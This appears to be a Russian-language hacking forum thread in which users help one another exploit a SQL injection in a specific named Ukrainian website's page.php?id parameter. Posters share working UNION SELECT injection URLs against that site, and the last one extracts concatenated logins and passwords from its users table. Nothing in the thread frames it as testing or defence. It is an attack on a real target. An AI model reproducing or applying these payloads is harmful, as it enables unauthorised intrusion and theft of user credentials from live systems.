есть сайт с уязвимым параметром page.php?id=35167

подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом :(
прав на запросы к msql. нету
прошу помощи у профов

поищи таблицы user user admin admins members и так далеее

Кароче займись подбором Таблиц и колонок....

вы непоняли вопроса.
я немогу вытащить оттуда инфу
например есть таблица users и в ней есть параметр id
но запрос union select 1,id from users ничего не выдает...

Линк дай.
Млять какой же народ пошел.

http://daily.com.ua/analytics/page.php?id=35167

Помойму иньекция на этот сайт проведена кем то из наших, во всяком случае в антибояне линк есть

http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*
http://daily.com.ua/analytics/page.php?id=-1+union+select+1,2/*

']http://daily.com.ua/analytics/page.php?id=-1+union+select+1,password+from+users/*

втф? либо я слепой, либо лыжи не едут, но вывода в упор не вижу.


подбор колонок показал что их две и есть таблица users но вытащить оттуда что либо неувенчалось успехом :(

http://daily.com.ua/analytics/page.php?id=3516+and(1=-1)+union+select+concat(login,char(95),password),6+ from+users/*